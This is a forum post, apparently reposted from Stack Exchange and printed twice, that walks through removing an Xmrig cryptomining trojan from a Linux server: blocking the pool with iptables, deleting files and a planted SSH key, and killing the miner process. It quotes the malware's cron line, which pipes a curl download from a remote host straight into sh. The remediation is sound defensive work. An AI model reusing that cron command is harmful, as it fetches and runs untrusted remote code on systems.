Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng - View Single Post - Hướng dẫn tìm và fix lỗi trojan đào coin Xmrig Trojan Miner

02-10-2020, 03:52 PM

Hướng dẫn tìm và fix lỗi trojan đào coin Xmrig Trojan Miner

On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

https://security.stackexchange.com/q...s-ec2-instance

02-10-2020, 03:52 PM	#1
hoctinhoc Guest Trả Lời: n/a	Hướng dẫn tìm và fix lỗi trojan đào coin Xmrig Trojan Miner Hướng dẫn tìm và fix lỗi trojan đào coin Xmrig Trojan Miner On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP. Removed the cron /15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 \| sh from /var/spool/cron/root and /var/spool/cron/crontabs/root. Removed the directory /opt/yam. Removed /root/.ssh/KHK75NEOiq. Deleted the files /opt/minerd and /opt/KHK75NEOiq33. Stopped the minerd process - pkill minerd. Stopped lady - service lady stop. I ran ps -eo pcpu,args --sort=-%cpu \| head, top -bn2 \|sed -n '7,25'p and ps aux \| grep minerd after that and the malware was nowhere to be seen. https://security.stackexchange.com/q...s-ec2-instance